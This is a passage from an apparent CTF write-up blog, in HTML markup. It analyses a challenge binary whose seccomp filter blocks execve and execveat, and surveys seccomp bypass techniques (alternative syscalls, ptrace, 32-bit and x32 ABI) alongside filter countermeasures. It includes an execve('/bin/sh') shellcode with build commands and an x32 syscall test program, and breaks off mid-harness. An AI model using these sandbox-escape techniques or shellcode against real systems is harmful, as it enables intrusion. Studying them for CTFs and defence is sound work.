class=\"language-text\">SECCOMP_MODE_FILTER</code>, so the following <code class=\"language-text\">prctl(0x16,2,local_18)</code> receives a <code class=\"language-text\">sock_fprog</code> placed on the stack (<code class=\"language-text\">local_18[0] = 8</code> is its <code class=\"language-text\">len</code>, eight BPF instructions, and <code class=\"language-text\">local_10</code> is its <code class=\"language-text\">filter</code> pointer) and registers the seccomp-bpf filter.</p>\n<p>Since this filter is defined as a raw byte sequence, the 
decompiler’s default analysis did not decode it, but seccomp-tools makes it easy to inspect.</p>\n<p>Running seccomp-tools on the binary reveals that <code class=\"language-text\">execve</code> and <code class=\"language-text\">execveat</code> are blocked:</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 876px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/b02edbebac3a05e00828345edc3b3306/1b1d5/image-20240620001242126.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 25.416666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA80lEQVQY022QzW6DMBAGkSrAsYHSkhgTGoP5MyihheTatH3/l/q68aGXchiNLFmzXnuyfIHuc1SDQprFyGSB59eDg8cpfCYQ7GJyhKeQI2Q7CCH+4IKDc44kScAYg1dXNUzdEAbWWhhTkTus6wek3COKBNI0AWehIwx8+L6PgOx53n/arkHTGnR9i/n9Qu7IM+5fnzjpE5RSqGqN821C2RfYywx5ntOww3bQjgMGO7jgZT7jcb7eVnz/3FG+HVEUCvIokS8KetEuPk7WrbsZNIZWbgzatqGLI72WPFqs14WCJTS98jGsnzoELHD/FMXRdoz4BUgFfCl8F7QqAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/b02edbebac3a05e00828345edc3b3306/8ac56/image-20240620001242126.webp 240w,\n/static/b02edbebac3a05e00828345edc3b3306/d3be9/image-20240620001242126.webp 480w,\n/static/b02edbebac3a05e00828345edc3b3306/21dbd/image-20240620001242126.webp 876w\"\n              sizes=\"(max-width: 876px) 100vw, 876px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/b02edbebac3a05e00828345edc3b3306/8ff5a/image-20240620001242126.png 240w,\n/static/b02edbebac3a05e00828345edc3b3306/e85cb/image-20240620001242126.png 
480w,\n/static/b02edbebac3a05e00828345edc3b3306/1b1d5/image-20240620001242126.png 876w\"\n            sizes=\"(max-width: 876px) 100vw, 876px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/b02edbebac3a05e00828345edc3b3306/1b1d5/image-20240620001242126.png\"\n            alt=\"image-20240620001242126\"\n            title=\"image-20240620001242126\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>This means that executing <code class=\"language-text\">execve</code>, <code class=\"language-text\">execveat</code>, or any operation that depends on them (such as <code class=\"language-text\">system</code>) is not possible. We need to retrieve the Flag while working around this constraint.</p>\n<h2 id=\"bypassing-seccomp\" style=\"position:relative;\"><a href=\"#bypassing-seccomp\" aria-label=\"bypassing seccomp permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Bypassing seccomp</h2>\n<p>To retrieve the Flag in this challenge, I want to understand seccomp bypass techniques as thoroughly as possible.</p>\n<h3 id=\"using-alternative-system-calls\" style=\"position:relative;\"><a href=\"#using-alternative-system-calls\" aria-label=\"using alternative system calls permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" 
version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Using Alternative System Calls</h3>\n<p>seccomp filtering can be implemented as either a blacklist or a whitelist.</p>\n<p>The blacklist approach explicitly specifies which system calls to block, as we have seen so far.</p>\n<p>The whitelist approach, on the other hand, can be implemented with code like the following, configuring the filter to allow only explicitly permitted system calls:</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;seccomp.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdio.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdlib.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;unistd.h></span></span>\n\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">define</span> <span class=\"token macro-name\">BUF_SIZE</span>    <span class=\"token expression\"><span class=\"token 
number\">256</span></span></span>\n\n<span class=\"token keyword\">void</span> <span class=\"token function\">install_seccomp</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    scmp_filter_ctx ctx <span class=\"token operator\">=</span> <span class=\"token function\">seccomp_init</span><span class=\"token punctuation\">(</span>SCMP_ACT_KILL<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n    <span class=\"token function\">seccomp_rule_add</span><span class=\"token punctuation\">(</span>ctx<span class=\"token punctuation\">,</span> SCMP_ACT_ALLOW<span class=\"token punctuation\">,</span> <span class=\"token function\">SCMP_SYS</span><span class=\"token punctuation\">(</span>exit_group<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">seccomp_rule_add</span><span class=\"token punctuation\">(</span>ctx<span class=\"token punctuation\">,</span> SCMP_ACT_ALLOW<span class=\"token punctuation\">,</span> <span class=\"token function\">SCMP_SYS</span><span class=\"token punctuation\">(</span>write<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token comment\">// seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(getpid), 0);</span>\n\n    <span class=\"token function\">seccomp_load</span><span class=\"token punctuation\">(</span>ctx<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">seccomp_release</span><span class=\"token punctuation\">(</span>ctx<span class=\"token punctuation\">)</span><span class=\"token 
punctuation\">;</span>\n\n    <span class=\"token keyword\">return</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">int</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token function\">install_seccomp</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n    <span class=\"token comment\">// Allowed: write is on the whitelist</span>\n    <span class=\"token function\">write</span><span class=\"token punctuation\">(</span>STDOUT_FILENO<span class=\"token punctuation\">,</span> <span class=\"token string\">\"write is allowed.\\n\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">18</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n    <span class=\"token comment\">// Disallowed: getpid is not whitelisted, so the default SCMP_ACT_KILL terminates the process here</span>\n    <span class=\"token function\">getpid</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n    <span class=\"token keyword\">return</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>This matters because a blacklist only blocks the calls it names: every other system call remains available, so an unlisted call that achieves the same effect as a blocked one can be used to bypass seccomp.</p>\n<p>For example, in the following writeup, <code class=\"language-text\">execve</code> was controlled by seccomp but <code class=\"language-text\">execveat</code> was not, which made exploitation possible:</p>\n<p>Reference: <a href=\"https://bitbucket.org/ptr-yudai/writeups/src/master/2019/ByteBandits_CTF_2019/lemonshell/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">ptr-yudai / writeups / 2019 
/ ByteBandits_CTF_2019 / lemonshell — Bitbucket</a></p>\n<p>Also, in the following challenge both <code class=\"language-text\">execve</code> and <code class=\"language-text\">execveat</code> were controlled, but the Flag was leaked to stdout using <code class=\"language-text\">splice</code>:</p>\n<p>Reference: <a href=\"https://ptr-yudai.hatenablog.com/?page=1577875543#pwn-961pts-babyseccomp\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">[pwn 961pts] babyseccomp</a></p>\n<p>Another challenge with <code class=\"language-text\">execve</code> and <code class=\"language-text\">execveat</code> controlled appears to bypass seccomp by forging an <code class=\"language-text\">execve</code> syscall using <code class=\"language-text\">fork</code> and <code class=\"language-text\">ptrace</code>. (I haven’t fully understood the technical details of this abuse, so I’ll write it up separately.)</p>\n<p>Reference: <a href=\"https://ptr-yudai.hatenablog.com/?page=1577875543#pwn-993pts-adult-seccomp\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">[pwn 993pts] adult seccomp</a></p>\n<p>As these show, it is sometimes possible to make exploitation work within the set of system calls not controlled by seccomp.</p>\n<p>The following site is useful for finding alternative system calls:</p>\n<p>Reference: <a href=\"https://x64.syscall.sh/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">x64.syscall.sh</a></p>\n<h3 id=\"abusing-ptrace\" style=\"position:relative;\"><a href=\"#abusing-ptrace\" aria-label=\"abusing ptrace permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 
1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Abusing ptrace</h3>\n<p>I won’t cover it in detail here, but seccomp bypass techniques using ptrace are also publicly known.</p>\n<p>Reference: <a href=\"https://blog.ssrf.in/post/bypass-seccomp-with-ptrace/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">ptrace を使用して seccomp による制限を回避してみる</a></p>\n<h3 id=\"bypass-using-32-bit-system-calls\" style=\"position:relative;\"><a href=\"#bypass-using-32-bit-system-calls\" aria-label=\"bypass using 32 bit system calls permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Bypass Using 32-bit System Calls</h3>\n<p>When the CPU is in Long mode, 32-bit programs can run in compatibility mode.</p>\n<p>Reference: <a href=\"https://en.wikipedia.org/wiki/Long_mode\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Long mode - Wikipedia</a></p>\n<p>Since seccomp controls by system call number, switching the code segment to issue 32-bit system calls — which differ from the 64-bit ones — can bypass the seccomp filter.</p>\n<p>Reference: 詳解セキュリティコンテスト P.480</p>\n<p>However, to prevent this bypass, seccomp filters may include an architecture validation check.</p>\n<p>The following filter from an earlier section is an example of a countermeasure against this bypass:</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token function\">BPF_STMT</span><span class=\"token 
punctuation\">(</span>BPF_LD <span class=\"token operator\">|</span> BPF_W <span class=\"token operator\">|</span> BPF_ABS<span class=\"token punctuation\">,</span> <span class=\"token function\">offsetof</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">struct</span> <span class=\"token class-name\">seccomp_data</span><span class=\"token punctuation\">,</span> arch<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"token function\">BPF_JUMP</span><span class=\"token punctuation\">(</span>BPF_JMP <span class=\"token operator\">|</span> BPF_JEQ <span class=\"token operator\">|</span> BPF_K<span class=\"token punctuation\">,</span> AUDIT_ARCH_X86_64<span class=\"token punctuation\">,</span> <span class=\"token number\">1</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"token function\">BPF_STMT</span><span class=\"token punctuation\">(</span>BPF_RET <span class=\"token operator\">|</span> BPF_K<span class=\"token punctuation\">,</span> SECCOMP_RET_KILL<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span></code></pre></div>\n<h3 id=\"seccomp-bypass-using-32-bit-abi\" style=\"position:relative;\"><a href=\"#seccomp-bypass-using-32-bit-abi\" aria-label=\"seccomp bypass using 32 bit abi permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 
6z\"></path></svg></a>seccomp Bypass Using 32-bit ABI</h3>\n<p>The 32-bit ABI here means the x32 ABI: a 64-bit interface that uses 32-bit addressing. Unlike the previous approach, it issues its system calls without switching the code segment.</p>\n<p>Because an x32 system call still reports <code class=\"language-text\">AUDIT_ARCH_X86_64</code> as its architecture, this allows x32 system calls to be issued, and seccomp to be bypassed, even when the filter validates the x86_64 architecture.</p>\n<p>The following is a helpful reference for bypassing seccomp using the 32-bit ABI:</p>\n<p>Reference: <a href=\"https://tripoloski1337.github.io/ctf/2021/07/12/bypassing-seccomp-prctl.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Bypassing seccomp BPF filter | tripoloski blog</a></p>\n<p>To counter this on the seccomp side, the filter can check whether the <code class=\"language-text\">__X32_SYSCALL_BIT</code> flag is set in the system call number once that number has been loaded, and reject the call if it is.</p>\n<p>Alternatively, a comparison such as <code class=\"language-text\">if (A &lt; 0x40000000)</code> accepts only system call numbers below the x32 range (<code class=\"language-text\">__X32_SYSCALL_BIT</code> is <code class=\"language-text\">0x40000000</code>), so any number with that bit set is rejected.</p>\n<p>Note: using the x32 ABI requires the kernel to be built with <code class=\"language-text\">CONFIG_X86_X32=y</code>.</p>\n<p>You can check this setting with:</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">zgrep CONFIG_X86_X32 /proc/config.gz</code></pre></div>\n<p>Reference: <a href=\"https://cds.cern.ch/record/1528222/files/LHCb-TALK-2013-060.pdf\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">ROOT and x32-ABI</a></p>\n<p>Reference: <a href=\"https://unix.stackexchange.com/questions/121424/linux-and-x32-abi-how-to-use\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">memory - Linux and x32-ABI - How to use? 
- Unix &#x26; Linux Stack Exchange</a></p>\n<p>However, after searching past writeups, I found multiple examples of bypassing seccomp with x86 ABI to run system calls like <code class=\"language-text\">open</code>, <code class=\"language-text\">read</code>, and <code class=\"language-text\">write</code>, but could not find any examples of launching <code class=\"language-text\">/bin/sh</code>.</p>\n<p>Also, testing with the following code and the <code class=\"language-text\">__X32_SYSCALL_BIT</code> flag, <code class=\"language-text\">write</code> worked but <code class=\"language-text\">execve</code> did not.</p>\n<p>(I suspect that executing 64-bit programs is not possible via 32-bit ABI, but I couldn’t find a definitive source; I’ll update this when I find one.)</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">define</span> <span class=\"token macro-name\">_GNU_SOURCE</span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;unistd.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;sys/syscall.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdint.h></span></span>\n\n<span class=\"token keyword\">int</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    \n    <span class=\"token function\">syscall</span><span class=\"token punctuation\">(</span>SYS_write<span 
class=\"token operator\">|</span>__X32_SYSCALL_BIT<span class=\"token punctuation\">,</span> <span class=\"token number\">1</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"Test x86 ABI.\\n\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">15</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n    <span class=\"token keyword\">const</span> <span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>path <span class=\"token operator\">=</span> <span class=\"token string\">\"/bin/ls\"</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">const</span> <span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>args<span class=\"token punctuation\">[</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">{</span> <span class=\"token string\">\"ls\"</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span> <span class=\"token punctuation\">}</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">const</span> <span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>env<span class=\"token punctuation\">[</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">{</span> <span class=\"token constant\">NULL</span> <span class=\"token punctuation\">}</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">syscall</span><span class=\"token punctuation\">(</span>SYS_execve<span class=\"token operator\">|</span>__X32_SYSCALL_BIT<span class=\"token punctuation\">,</span> <span class=\"token string\">\"/bin/ls\"</span><span class=\"token punctuation\">,</span> args<span class=\"token punctuation\">,</span> env<span class=\"token punctuation\">)</span><span 
class=\"token punctuation\">;</span>\n\n    <span class=\"token keyword\">return</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p><img src=\"/static/14536841a1188e5afad1a6c6fb15ffd5/6bff2/image-20240621005044485.png\" alt=\"image-20240621005044485\"></p>\n<h2 id=\"about-execve-and-execveat\" style=\"position:relative;\"><a href=\"#about-execve-and-execveat\" aria-label=\"about execve and execveat permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>About execve and execveat</h2>\n<p>In the previous section, I briefly summarized general seccomp bypass methods.</p>\n<p>Before considering which bypass is applicable here, I want to understand what operations become unavailable when <code class=\"language-text\">execve</code> and <code class=\"language-text\">execveat</code> are blocked — as in this challenge binary.</p>\n<p>First, <code class=\"language-text\">execve</code> is a system call that executes the program referenced by the given pathname.</p>\n<p>It replaces the current process image and starts a new program.</p>\n<p>Reference: <a href=\"https://man7.org/linux/man-pages/man2/execve.2.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">execve(2) - Linux manual page</a></p>\n<p>According to <em>Understanding the Linux Kernel, 3rd Edition</em>, various functions that can execute programs — such as <code
class=\"language-text\">execl</code>, <code class=\"language-text\">execlp</code>, <code class=\"language-text\">execle</code>, <code class=\"language-text\">execv</code>, and <code class=\"language-text\">execvp</code> — are all wrapper routines around <code class=\"language-text\">execve</code> and internally depend on it.</p>\n<p>Therefore, when <code class=\"language-text\">execve</code> is controlled by seccomp, these functions also become unavailable.</p>\n<p>Also, <code class=\"language-text\">system</code> uses <code class=\"language-text\">fork</code> to create a child process that runs a given shell command, and uses <code class=\"language-text\">execl</code> internally.</p>\n<p>So if <code class=\"language-text\">execve</code> is controlled, <code class=\"language-text\">system</code> becomes unavailable as well.</p>\n<p>Reference: <a href=\"https://man7.org/linux/man-pages/man3/system.3.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">system(3) - Linux manual page</a></p>\n<p>However, even when <code class=\"language-text\">execve</code> is blocked, the <code class=\"language-text\">execveat</code> system call may still be usable.</p>\n<p><code class=\"language-text\">execveat</code> works like <code class=\"language-text\">execve</code> but offers more flexible path specification.</p>\n<p><code class=\"language-text\">execveat</code> can execute a program referenced by a combination of <code class=\"language-text\">dirfd</code> and <code class=\"language-text\">pathname</code>, allowing execution via a path relative to the directory referenced by <code class=\"language-text\">dirfd</code>.</p>\n<p>Reference: <a href=\"https://www.man7.org/linux/man-pages/man2/execveat.2.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">execveat(2) - Linux manual page</a></p>\n<p>As shown, when both <code class=\"language-text\">execve</code> and <code class=\"language-text\">execveat</code> are blocked, executing any shell or program available 
on the Linux system becomes extremely difficult.</p>\n<p>The following writeup explicitly states that binary execution is impossible when both <code class=\"language-text\">execve</code> and <code class=\"language-text\">execveat</code> are blocked:</p>\n<p>Reference: <a href=\"https://ptr-yudai.hatenablog.com/?page=1577875543#pwn-993pts-adult-seccomp\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">[pwn 993pts] adult seccomp</a></p>\n<h2 id=\"shell-code-introduction\" style=\"position:relative;\"><a href=\"#shell-code-introduction\" aria-label=\"shell code introduction permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Shell Code Introduction</h2>\n<h3 id=\"creating-a-shell-code\" style=\"position:relative;\"><a href=\"#creating-a-shell-code\" aria-label=\"creating a shell code permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Creating a Shell Code</h3>\n<p>From here, I’ll work on creating Shell Code to retrieve the Flag.</p>\n<p>Shell Code refers to a set of machine-code instructions; by sending this kind of 
Shell Code as a payload to a vulnerable service, it can be used to exploit vulnerabilities and execute arbitrary code.</p>\n<p>A ROP chain is also conceptually related — it links ROP gadgets corresponding to individual Shell Code instructions.</p>\n<p>Below is an example of simple Shell Code:</p>\n<div class=\"gatsby-highlight\" data-language=\"nasm\"><pre class=\"language-nasm\"><code class=\"language-nasm\"><span class=\"token keyword\">BITS 64</span>\n<span class=\"token keyword\">global _start</span>\n\n<span class=\"token label function\">_start:</span>\n    lea <span class=\"token register variable\">rdi</span>, [rel binsh]  <span class=\"token comment\">; pathname (RIP-relative, so the bytes stay position-independent)</span>\n    xor <span class=\"token register variable\">rsi</span>, <span class=\"token register variable\">rsi</span>       <span class=\"token comment\">; argv = NULL</span>\n    xor <span class=\"token register variable\">rdx</span>, <span class=\"token register variable\">rdx</span>       <span class=\"token comment\">; envp = NULL</span>\n    mov <span class=\"token register variable\">rax</span>, <span class=\"token number\">59</span>        <span class=\"token comment\">; execve</span>\n    syscall\n\n<span class=\"token keyword\">section .data</span>\n    binsh db <span class=\"token string\">\"/bin/sh\"</span>, <span class=\"token number\">0</span></code></pre></div>\n<p>This assembly code can be built with the following commands:</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\"># Generate Shell Code</span>\nnasm shellcode.s -O0 -f bin -o shellcode\n\n<span class=\"token comment\"># Compile as ELF</span>\nnasm shellcode.s -f elf64 <span class=\"token punctuation\">;</span> ld shellcode.o -o shellcode</code></pre></div>\n<p>Using <code class=\"language-text\">nasm shellcode.s -O0 -f bin -o shellcode</code> assembles the instructions exactly as written (<code class=\"language-text\">-O0</code> disables NASM's instruction-size optimization) into a raw, header-less binary (<code class=\"language-text\">-f bin</code>), which is the Shell Code itself.</p>\n<p>Using <code class=\"language-text\">nasm shellcode.s -f elf64 ; ld shellcode.o -o shellcode</code> links the Shell Code as an ELF, allowing you to actually test and debug the behavior.</p>\n<p>To directly test created Shell Code,
you can use the following code:</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdio.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdlib.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;string.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;sys/mman.h></span></span>\n\n<span class=\"token keyword\">int</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">void</span> <span class=\"token operator\">*</span>exec_mem <span class=\"token 